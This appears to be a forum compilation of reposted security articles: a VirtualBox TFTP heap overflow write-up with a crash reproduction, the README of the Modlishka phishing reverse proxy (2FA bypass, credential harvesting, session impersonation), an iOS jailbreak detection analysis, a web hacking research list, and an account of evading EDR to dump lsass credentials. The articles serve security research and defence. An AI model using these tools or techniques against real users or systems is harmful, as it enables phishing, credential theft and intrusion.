                    if (pTftpSession->OptionBlkSize.u64Value > UINT16_MAX)
                        rc = VERR_INVALID_PARAMETER;
                }
            ...

    'blksize' option is checked if the value is > UINT16_MAX. Later the value OptionBlkSize.u64Value gets used in tftpReadDataBlock() to read the file content:

        DECLINLINE(int) tftpReadDataBlock(PNATState pData,
                                          PTFTPSESSION pcTftpSession,
                                          uint8_t *pu8Data,
                                          int *pcbReadData)
        {
            RTFILE hSessionFile;
            int rc = VINF_SUCCESS;
            uint16_t u16BlkSize = 0;
            . . .
            AssertReturn(pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX, VERR_INVALID_PARAMETER);
            . . .
            u16BlkSize = (uint16_t)pcTftpSession->OptionBlkSize.u64Value;
            . . .
            rc = RTFileRead(hSessionFile, pu8Data, u16BlkSize, &cbRead);
            . . .
        }

    pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX validation is incorrect. During the call to RTFileRead(), the file contents can overflow the buffer adjacent to 'pu8Data' by setting a value for blksize greater than the MTU. This bug can be used in combination with directory traversal bug to trigger the heap overflow with controlled data e.g.
if shared folders are enabled, guest can drop a file with arbitrary contents in the host, then read the file using directory traversal bug. For the ease of debugging lets use VirtualBox for Linux. Create a file of size say UINT16_MAX in the host TFTP root folder i.e. ~/.config/VirtualBox/TFTP, then read the file from the guest with a large blksize value guest@ubuntu:~$ atftp --trace --verbose --option "blksize 65535" --get -r payload -l payload Thread 30 "NAT" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fff8ccf4700 (LWP 11024)] [----------------------------------registers-----------------------------------] RAX: 0x4141414141414141 ('AAAAAAAA') RBX: 0x7fff8e5f16dc ('A' ...) RCX: 0x1 RDX: 0x4141414141414141 ('AAAAAAAA') RSI: 0x800 RDI: 0x140e730 --> 0x219790326 RBP: 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) RSP: 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) RIP: 0x7fff9457d8a8 (<slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx) R8 : 0x0 R9 : 0x10 R10: 0x41414141 ('AAAA') R11: 0x7fff8e5f1de4 ('A' ...) R12: 0x140e720 --> 0xdead0002 R13: 0x7fff8e5f1704 ('A' ...) R14: 0x140e7b0 --> 0x7fff8e5f16dc ('A' ...) 
R15: 0x140e730 --> 0x219790326 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fff9457d89f <slirp_uma_alloc>: test rax,rax 0x7fff9457d8a2 <slirp_uma_alloc>: je 0x7fff9457d8b0 <slirp_uma_alloc> 0x7fff9457d8a4 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] => 0x7fff9457d8a8 <slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx 0x7fff9457d8ac <slirp_uma_alloc>: mov rax,QWORD PTR [rbx+0x18] 0x7fff9457d8b0 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] 0x7fff9457d8b4 <slirp_uma_alloc>: mov QWORD PTR [rdx],rax 0x7fff9457d8b7 <slirp_uma_alloc>: mov rax,QWORD PTR [r12+0x88] [------------------------------------stack-------------------------------------] 0000| 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) 0008| 0x7fff8ccf39b8 --> 0x140e720 --> 0xdead0002 0016| 0x7fff8ccf39c0 --> 0x7fff8e5eddde --> 0x5b0240201045 0024| 0x7fff8ccf39c8 --> 0x140dac4 --> 0x0 0032| 0x7fff8ccf39d0 --> 0x140e730 --> 0x219790326 0040| 0x7fff8ccf39d8 --> 0x140dac4 --> 0x0 0048| 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) 0056| 0x7fff8ccf39e8 --> 0x7fff9457df41 (<uma_zalloc_arg>: test rax,rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV Posted by Reno Robert at 6:41 PM Sursa: https://www.voidsecurity.in/2019/01/virtualbox-tftp-server-pxe-boot.html
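The blksize problem in the VirtualBox write-up above comes down to bounding the requested block size only by UINT16_MAX and not by the space actually left in the reply buffer. The following is a minimal sketch of a stricter check, not VirtualBox's actual fix: `tftp_effective_blksize`, `TFTP_BLKSIZE_MIN`, `TFTP_BLKSIZE_MAX` and the `cbBufAvail` parameter are hypothetical names chosen for illustration. The 8 to 65464 range is the one RFC 2348 gives for the blksize option.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Range allowed for the TFTP "blksize" option by RFC 2348. */
#define TFTP_BLKSIZE_MIN 8u
#define TFTP_BLKSIZE_MAX 65464u

/*
 * Hypothetical helper (not VirtualBox code): returns how many bytes may
 * safely be read into a reply buffer that has `cbBufAvail` bytes free.
 * Returns 0 when the request is out of range or nothing fits.
 */
static uint16_t tftp_effective_blksize(uint64_t u64Requested, size_t cbBufAvail)
{
    /* The result is returned as uint16_t, so the upper bound must fit. */
    assert(TFTP_BLKSIZE_MAX <= UINT16_MAX);

    /* Reject values outside the protocol range instead of truncating them. */
    if (u64Requested < TFTP_BLKSIZE_MIN || u64Requested > TFTP_BLKSIZE_MAX)
        return 0;

    /* Never read more than the destination buffer can hold. */
    if (u64Requested > cbBufAvail)
        return (uint16_t)cbBufAvail;

    return (uint16_t)u64Requested;
}
```

Under these assumptions, a request for 65535 bytes is rejected outright, and a request for 65464 bytes against a 1400-byte buffer is clamped to 1400, so a later RTFileRead()-style call has no room to write past the buffer.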
  7. ..Modlishka..

Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).

Enjoy

Features

Some of the most important 'Modlishka' features:

  • Support for the majority of 2FA authentication schemes (by design).
  • No website templates (just point Modlishka to the target domain; in most cases, it will be handled automatically).
  • Full control of "cross" origin TLS traffic flow from your victims' browsers (through custom new techniques).
  • Flexible and easily configurable phishing scenarios through configuration options.
  • Pattern-based JavaScript payload injection.
  • Stripping websites of all encryption and security headers (back to 90's MITM style).
  • User credential harvesting (with context based on URL parameter passed identifiers).
  • Can be extended with your ideas through plugins.
  • Stateless design. Can be scaled up easily for an arbitrary number of users, e.g. through a DNS load balancer.
  • Web panel with a summary of collected credentials and user session impersonation (beta).
  • Written in Go.

Action

"A picture is worth a thousand words": Modlishka in action against an example 2FA (SMS) enabled authentication scheme: https://vimeo.com/308709275

Note: google.com was chosen here just as a POC.

Installation

Latest source code version can be fetched from here (zip) or here (tar).

Fetch the code with 'go get':

    $ go get -u github.com/drk1wi/Modlishka

Compile the binary and you are ready to go:

    $ cd $GOPATH/src/github.com/drk1wi/Modlishka/
    $ make

    # ./dist/proxy -h
    Usage of ./dist/proxy:
      -cert string
            base64 encoded TLS certificate
      -certKey string
            base64 encoded TLS certificate key
      -certPool string
            base64 encoded Certification Authority certificate
      -config string
            JSON configuration file. Convenient instead of using command line switches.
      -credParams string
            Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)
      -debug
            Print debug information
      -disableSecurity
            Disable security features like anti-SSRF. Disable at your own risk.
      -jsRules string
            Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
      -listeningAddress string
            Listening address (default "")
      -listeningPort string
            Listening port (default "443")
      -log string
            Local file to which fetched requests will be written (appended)
      -phishing string
            Phishing domain to create - Ex.: target.co
      -plugins string
            Comma seperated list of enabled plugin names (default "all")
      -postOnly
            Log only HTTP POST requests
      -rules string
            Comma separated list of 'string' patterns and their replacements.
      -target string
            Main target to proxy - Ex.: https://target.com
      -targetRes string
            Comma separated list of target subdomains that need to pass through the proxy
      -terminateTriggers string
            Comma separated list of URLs from target's origin which will trigger session termination
      -terminateUrl string
            URL to redirect the client after session termination triggers
      -tls
            Enable TLS (default false)
      -trackingCookie string
            Name of the HTTP cookie used to track the victim (default "id")
      -trackingParam string
            Name of the HTTP parameter used to track the victim (default "id")

Usage

Check out the wiki page for a more detailed overview of the tool usage.

  • FAQ (Frequently Asked Questions)
  • Blog post

License

Modlishka was made by Piotr Duszyński (@drk1wi). You can find the license here.

Credits

Thanks for helping with the code go to Giuseppe Trotta (@Giutro).

Disclaimer

This tool is made only for educational purposes and can only be used in legitimate penetration tests. The author does not take any responsibility for any actions taken by its users.

Source: https://github.com/drk1wi/Modlishka
  8. JANUARY 18TH, 2019

Jailbreak Detector Detector: An Analysis of Jailbreak Detection Methods and the Tools Used to Evade Them

Why Do People Jailbreak?

Apple’s software distribution and security model relies on end users running software exclusively distributed by Apple, either via inclusion in the base operating system or via the App Store. To run applications that are not available in the App Store or make modifications to the behavior of the operating system, a “jailbreak” is required: effectively, an exploit that allows the user to gain administrative access to the iOS device. After jailbreaking, users can install applications and tweaks via unofficial app stores.

Jailbroken devices are also excellent tools for security researchers. iOS kernel security research is significantly easier with root-level access to the device. Gal Beniamini from Google’s Project Zero says:

    Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking).

In short, people jailbreak their devices for many reasons, ranging from research to personal philosophy. Regardless of the user’s rationale, the presence of a jailbreak on a device means that the security model of the OS can no longer be adequately trusted or reasoned about by an application.

The History of Jailbreaking

The first iPhone was released in June 2007, and in August 2007, George Hotz became the first person to carrier-unlock the iPhone. A carrier-unlock is not the same as a jailbreak, but in this case, jailbreaking the device was a prerequisite. Hotz’s original exploit required a small hardware modification to the device, but software-only jailbreaks were released soon after.

Since then, Apple and jailbreak developers have been in a cat-and-mouse game, with Apple patching vulnerabilities while developers and researchers attempt to find new ones. The jailbreak scene has shrunk significantly since the release of the original iPhone. As Apple hardens the security of its iOS devices, exploiting them becomes significantly harder. The value of an iOS exploit on the private market is easily several hundred thousand dollars, and can also exceed $1,000,000 under the right criteria (remote, persistent and zero-click), making a private sale a much more lucrative option than releasing it publicly.

Why Do We Care About Jailbreaking at Duo?

At Duo, we give administrators insight into the health of devices used to access corporate resources. In a BYOD context, it is important to be able to understand the security properties of the devices on your network. Jailbreaking an iOS device does not, on its own, make it less secure. There are two main issues with the security of a jailbroken device:

First, running untrusted (non-App-Store*) code on the device, especially outside of the sandbox, makes it harder to reason about the security properties of the device.

The second, more concerning issue is that users of jailbroken devices frequently hold off on updating their devices, as jailbreak development usually lags behind official software releases.

Administrators may want to only allow up-to-date devices access to resources on their network, as software updates frequently patch security vulnerabilities. A jailbroken device can masquerade as an up-to-date device by misreporting its software version. As a result, administrators cannot trust version information submitted by jailbroken devices, so it is important to be able to detect the jailbroken state.

* While, in general, we can expect that the App Store review process will prevent actively malicious applications from distribution on the App Store, this is not always the case. The XcodeGhost malware is an example of how malicious code was shipped as part of well-known and trusted applications on the App Store.

How Are Jailbreaks Usually Detected?

There exists only scattered information online about jailbreak detection methodology. This is partially because jailbreak detection is a sort of “special sauce.” Developers of mobile applications would rather keep their methodology private, and there is no real incentive to talk about it publicly. I was able to learn about existing jailbreak detection methods from some online documentation and communities like r/jailbreak, but most of the useful information I learned in the course of this research came from reverse engineering popular anti-jailbreak-detection tools.

Most jailbreak detection methods fall into the following categories:

  • File existence checks
  • URI scheme registration checks
  • Sandbox behavior checks
  • Dynamic linker inspection

File Existence

Most public jailbreak methods leave behind certain files on the filesystem. The clearest example is Cydia. Cydia is an alternative app store commonly used to distribute tweaks (UI changes, extra gestures, etc.) and third-party applications to users of jailbroken devices. As a result, nearly every jailbroken device has a directory at /Applications/Cydia.app. If this path exists on the filesystem, you can be sure your application is running on a jailbroken device.

There are also various binaries such as bash and sshd commonly found on jailbroken devices, as well as files intentionally left by jailbreak utilities to mark that a device has already been jailbroken, preventing the utility from running twice and possibly causing unintended harm.

URI Schemes

iOS applications can register custom URI schemes. Duo uses this functionality so that clickable web links can open the Duo Mobile app, making the setup of Duo Mobile easy. Cydia registered the cydia:// URI scheme to allow direct links to apps available via Cydia. iOS allows applications to check which URI schemes are registered, so the presence of the cydia:// URI scheme is frequently used to check if Cydia is installed and the device is jailbroken. Unfortunately, some apps perform this detection by attempting to register the cydia:// URI scheme for themselves, so checking if the scheme is registered may produce a false positive on a non-jailbroken device.

Sandbox Behavior

Jailbreaks frequently patch the behavior of the iOS application sandbox. As an example, calls to fork() are disallowed on a stock iOS device: an iOS app may not spawn a child process. If you are able to successfully execute fork(), your code is likely running on a jailbroken device.

Dynamic Linker Inspection

Dynamic linking is a way for executables to take advantage of code provided by other libraries without compiling and shipping that code in the executable. This helps different executables reuse code without including a copy of it. Dynamic linking allows for much smaller binaries with the same functionality. The alternative to this is “static linking,” where all code that an executable uses is shipped with the executable.

While we haven’t discussed them yet, anti-jailbreak-detection tools are frequently loaded as dynamic libraries. The iOS dynamic linker is called dyld, and exposes the ability to inspect the libraries loaded into the currently-running process. As a result, we should be able to detect the presence of anti-jailbreak-detection tools by looking at the names and numbers of libraries loaded into the current process. If an anti-jailbreak-detection tool is running, we know the device is jailbroken.

How Do End Users Prevent Detection?

Many mobile applications will refuse to run if they detect that the device they are running on is jailbroken. In Duo’s case, we do not prevent use of the Duo Mobile app, but Duo administrators may prevent jailbroken devices from authenticating to protected applications. For these reasons, users of jailbroken devices frequently install anti-jailbreak-detection tools that aim to hide the tampered status of the device. These tools modify operating system functionality such that the device acts as though it were in an untampered state. They are effectively a type of intentionally installed rootkit, though generally running in userland rather than in the iOS kernel. The specific functions that are hooked and the methods used to hook them vary.

Objective-C Runtime Method Hooking

Objective-C dispatches method calls at runtime. Calling a method is akin to sending a message (à la Smalltalk). This stands counter to languages like C, in which a function call might take the form of a jump to the called function’s location in memory. Because method calls are dispatched at runtime, Objective-C also allows you to add or replace methods at runtime. This is sometimes referred to as “method swizzling,” and takes the form of a call to class_addMethod or method_setImplementation.

fileExistsAtPath is an Objective-C method commonly used to check for the existence of jailbreak artifacts. Replacing the implementation of fileExistsAtPath to always return false for a list of known jailbreak artifacts is a common strategy to defeat this jailbreak detection technique.

Editing the Linker Table

When a dynamically loaded library is used in an executable, its symbols must be bound: the executable has to figure out where the shared code actually lives in memory. On an iOS system using dyld, a call to printf, for example, is actually a call to an address that lives in the __stubs section. At this address is a single jmp instruction to an address loaded from the __la_symbol_ptr (lazy symbol pointers) or __nl_symbol_ptr (non-lazy symbol pointers) section. Lazy symbol pointers are resolved the first time they are called, and non-lazy symbol pointers are resolved before the program runs.
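As a rough model of this indirection (plain C, not real Mach-O or Objective-C machinery), a symbol pointer behaves like a function-pointer slot that every call site goes through. In the sketch below, `real_exists`, `hooked_exists`, `exists_slot`, `check_path` and `install_hook` are hypothetical names, and `real_exists` is a stand-in that pretends every path exists; the only point is that overwriting one slot changes the answer for every caller.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*exists_fn)(const char *path);

/* Stand-in for the genuine check; here it pretends every path exists. */
static int real_exists(const char *path) { (void)path; return 1; }

/* One artifact named in the text; a real list would be longer. */
static const char *const hidden_paths[] = { "/Applications/Cydia.app" };

/* Replacement: deny hidden paths, defer to the original otherwise. */
static int hooked_exists(const char *path)
{
    for (size_t i = 0; i < sizeof hidden_paths / sizeof hidden_paths[0]; i++)
        if (strcmp(path, hidden_paths[i]) == 0)
            return 0;
    return real_exists(path);
}

/* Plays the role of one symbol-pointer entry: a slot holding an address. */
static exists_fn exists_slot = real_exists;

/* Plays the role of the stub: callers only ever jump through the slot. */
static int check_path(const char *path)
{
    assert(path != NULL);
    return exists_slot(path);
}

/* Overwriting the slot redirects every later call made via check_path(). */
static void install_hook(void) { exists_slot = hooked_exists; }
```

Before `install_hook()` runs, `check_path("/Applications/Cydia.app")` reports the path as present; afterwards it reports it as absent while unrelated paths are unaffected, which is the behavior a detection routine relying on the shared entry point would observe.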
You can read more about how the linker works on Mike Ash’s blog, but the important thing to understand is that the entry in the __xx_symbol_ptr table will, after the symbol has been resolved, contain the proper address for the function being called. A consequence of this design is that if you want to hook every call to printf, you can do so by replacing a single entry in the __la_symbol_ptr section. All calls to printf from that point on will jump to your custom hook.

Anti-jailbreak-detection tools make use of this technique to hook functions that may be used to check for file existence or that may expose non-standard sandbox behavior.

This is an example of a hooked version of the fopen function. As a reminder, the fopen function will attempt to open a file (by path name), and either return a pointer to the open file handle or null if it cannot open the file. If fopen returns non-null when called with a path to a known jailbreak artifact, you can be sure the device is jailbroken.

The above hooked version checks the path of the file to be opened against a list of “forbidden” files. These are known jailbreak artifacts as well as files that are usually present on the system but can only be opened if the sandbox has been modified. The hooked fopen will act as though those files do not exist or cannot be opened, and otherwise defer to the original fopen implementation.

Functions like fopen, lstat, etc. are hooked to prevent detection of files on the filesystem. Some other functions, such as fork, are hooked to always return a constant value (for example, a hooked version of fork may return -1, indicating that fork is not allowed, which is consistent with the behavior of an untampered sandbox).

Patching the Linker

We mentioned that dyld exposes functionality that allows clients to inspect what libraries have been loaded into the running process. Anti-jailbreak-detection tools are loaded into processes as shared libraries, and dyld will expose this. To combat this, some anti-jailbreak-detection tools also hook exposed dyld functionality to hide their presence.

A slightly more interesting way to detect the presence of a jailbreak using the dynamic linker makes use of dlsym to try to determine the addresses of the original, unhooked functions. dlsym should give you the correct address for a dynamically linked function, even if its entry in the linker symbol table has been overwritten. Some anti-jailbreak-detection tools are aware of this, and will actually intercept calls to dlsym and return pointers to the hooked functions. This is an interesting example of the cat-and-mouse game that has been played between app developers who wish to detect jailbroken devices and hobby developers who maintain anti-jailbreak-detection tools.

Summary

These are only some of the methods used to evade jailbreak detection. While they differ in nature, they all rely on various forms of indirection: functionality provided by the Objective-C runtime or by shared libraries can be overridden with ease and made to report “correct” answers, similar to a rootkit. An ideal jailbreak detection method would rely on as little indirection as possible.

Can We Reliably Detect Jailbroken Devices?

We would like to look for artifacts of a jailbroken device (existence of certain files, sandbox behavior, etc.) while relying on as little shared functionality as possible. However, we need to rely on functionality exposed by the operating system to make these checks. In the usual case, to check if a file can be opened, we would call the fopen syscall wrapper exposed as part of a shared library. As detailed in previous sections, functions in shared libraries might be replaced with tampered versions that prevent our checks from working.

As a refresher, a syscall is an interface to privileged functionality exposed to userspace code by the kernel. It may be dangerous to allow userspace code to directly read or write blocks on a hard drive, for example, so we instead use the open syscall to say “hey kernel, can you please perform the privileged action of opening this file for me, and then give me a handle I can use to interact with it.” Functions like fopen are just that (functions), but they wrap a special type of instruction used to jump into the kernel.

On the x86 architecture, under Linux, the INT 0x80 instruction is the most well-known way to perform a syscall (with newer options available, like the x86-64 syscall instruction). INT stands for “interrupt,” and the INT instruction causes the CPU to jump to a special section of code called an interrupt handler, running in the context of the kernel. The end result is that userspace can trigger the execution of privileged code in a controlled manner, without being able to arbitrarily execute privileged code.

The iPhone uses the ARM processor architecture. ARM’s equivalent of INT is the SVC opcode (“Supervisor Call”), and the equivalent to INT 0x80 on an ARM processor is SVC 0x80. Functions like fopen may do some sanity-checking and processing of arguments in userspace, but they will eventually use SVC 0x80 to ask the kernel to perform the privileged action of providing access to a file.

The important takeaway here is that if we would like to avoid relying on shared wrapper functions that may be hooked, we can actually perform syscalls directly using the same opcodes the wrapper functions use. We can also inline these calls to avoid having a single call target for our custom syscall wrappers that might be overwritten. This lets us avoid the layers of indirection that come with jumping to functions exposed by shared libraries, shielding us from possible symbol table tampering.

Drawbacks

Even though this approach solves some of our problems, there are drawbacks.

First, writing custom syscall wrappers can require maintenance, especially if there are new architectures you need to support. Additionally, the syscall interface may change over time, and the shared libraries provided by the operating system will keep up with those changes, whereas your custom implementation may not.

Second, while this approach makes it harder for end users to evade jailbreak detection, it doesn’t make it impossible. The flow of the data after the syscall (say, a boolean that indicates whether a jailbreak artifact exists) is still vulnerable to tampering. Additionally, a determined attacker could patch out the checks, or even possibly modify the kernel.

Conclusion

Approaches like this must be considered in the context of a threat model. It is impossible to guarantee that you will be able to detect a tampered device for the simple reason that you are restricted to running in userspace, whereas anti-jailbreak-detection utilities can run in a privileged context. With that said, the goal is not perfect security, but rather sufficient security such that the average end user of a jailbroken device, who is not a determined attacker, will not be able to evade detection.

Ultimately, the security of your application cannot rely on hiding the way it works. Proper server-side validation of client-submitted data, use of well-known cryptographic protocols, and use of hardware-backed cryptographic functionality available in many newer devices all go a long way to strengthening the security posture of your application without relying on obscurity.

Source: https://duo.com/blog/jailbreak-detector-detector
  9. Top 10 web hacking techniques of 2018 - nominations open

James Kettle | 03 January 2019 at 14:43 UTC

Nominations are now open for the top 10 new web hacking techniques of 2018.

Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity.

As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases:

  • Jan 1st: Start to collect community nominations
  • Jan 21st: Launch community vote to build shortlist of top 15
  • Feb 11th: Panel vote on shortlist to select final top 10

Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research.

To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available.

If you want, you can take a look at past years’ top 10 to get an idea for what people feel constitutes great research. You can find previous year's results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17.

Nominations so far

Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts.

  • How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting
  • Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog
  • EdOverflow | An analysis of logic flaws in web-of-trust services.
  • OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
  • PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf
  • Scratching the surface of host headers in Safari
  • RCE by uploading a web.config – 003Random’s Blog
  • Security: HTTP Smuggling, Apsis Pound load balancer | RBleug
  • Piercing the Veil: Server Side Request Forgery to NIPRNet access
  • inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra
  • inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra
  • inputzero: An untold story of skype by microsoft | Dhiraj Mishra
  • Neatly bypassing CSP – Wallarm
  • Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf
  • Beyond XSS: Edge Side Include Injection :: GoSecure
  • GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution
  • Logically Bypassing Browser Security Boundaries - Speaker Deck
  • Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out
  • Web Cache Deception Attack - YouTube
  • Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security
  • #307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user
  • lanmaster53.com
  • Beyond XSS: Edge Side Include Injection :: GoSecure
  • Scratching the surface of host headers in Safari
  • #309531 Stored XSS in Snapmatic + R★Editor comments
  • InsertScript: Adobe Reader PDF - Client Side Request Injection
  • $36k Google App Engine RCE - Ezequiel Pereira
  • MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox
  • #341876 SSRF in Exchange leads to ROOT access in all instances
  • reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho
  • Data Exfiltration via Formula Injection #Part1
  • Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog
  • Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi
  • Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox
  • Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog
  • Evading CSP with DOM-based dangling markup | Blog
  • Save Your Cloud: DoS on VMs in OpenNebula 4.6.1
  • CRLF Injection Into PHP’s cURL Options – TomNomNom – Medium
  • Practical Web Cache Poisoning | Blog
  • #317476 Account Takeover in Periscope TV
  • A timing attack with CSS selectors and Javascript
  • VPN Extensions are not for privacy
  • Exposing Intranets with reliable Browser-based Port scanning | Blog
  • Exploiting XXE with local DTD files
  • A story of the passive aggressive sysadmin of AEM - Speaker Deck
  • Hunting for security bugs in AEM webapps - Speaker Deck
  • ASP.NET resource files (.RESX) and deserialisation issues
  • Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی
  • Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste!
  • cat ~/footstep.ninja/blog.txt
  • Blog - RCE due to ShowExceptions
  • MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution
  • Blog on Gopherus Tool
  • DNS Rebinding Headless Browsers
  • It's A PHP Unserialization Vulnerability Jim But Not As We Know It

James Kettle @albinowax

Source: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
  10. Bypass EDR’s memory protection, introduction to hooking

Hoang Bui, Jan 18

Introduction

On a recent internal penetration engagement, I was faced with an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials.

For those who recommend ProcDump

The Wrong Path

So now, as an ex-malware author, I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that came to my mind was ObRegisterCallbacks, which is commonly used by many antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy WinAPI hooks that resemble malware rootkits. However, at the bottom of the MSDN page, you will notice text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on Windows Server 2003 at the moment. Therefore, it is missing the necessary function to perform this block.

After spending hours and hours doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass.

There is no EDR solution on this machine, this was just a PoC

However, after thinking “I got this!” and getting ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason, the code, while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe.

WHAT?!

Hold up, let me try just opening a handle to lsass.exe without any fancy stuff, with just this line:

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid);

And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuss about this. This is when I realized I had started off with the wrong approach: the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny.

Back on Track

Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly.

Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called, such as ReadProcessMemory (RPM), inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS.

Multiple calls to RPM

As you can see, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1), and this is probably the root of our issue.

Now here is where a bit of experience comes into play. You must understand Windows system internals and how WINAPIs are processed. Using ReadProcessMemory as an example, it works like this: ReadProcessMemory is just a wrapper. It does a bunch of sanity checks, such as a nullptr check. That is all RPM does. However, RPM also calls a function “NtReadVirtualMemory”, which sets up the registers before doing a syscall instruction. The syscall instruction just tells the CPU to enter kernel mode, where another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do.
— — — — — -Userland — — — —- — — — | — — — Kernel Land — — — — RPM — > NtReadVirtualMemory --> SYSCALL->NtReadVirtualMemory Kernel32 — — -ntdll — — — — — — — — — - — — — — — ntoskrnl With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned. However, readers should know that most if not all EDR products are using a service, specifically a driver running inside kernel mode. With access to the kernel mode, the driver could perform the hook at ANY of the level in the RPM’s callstack. However, this opens up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution is to put forward to prevent modification of such nature and that solution is known as Kernel Patch Protection (KPP or Patch Guard). KPP scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes ntoskrnl portion which houses the WINAPI’s kernel level’s logic. With this knowledge, we are assured that the EDR would not and did not hook any kernel level function inside that portion of the call stack, leaving us with the user-land’s RPM and NtReadVirtualMemory calls. The Hook To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below. However, unlike RPM, NtReadVirtualMemory is not an exported function inside ntdll and therefore you cannot just reference to the function like normal. 
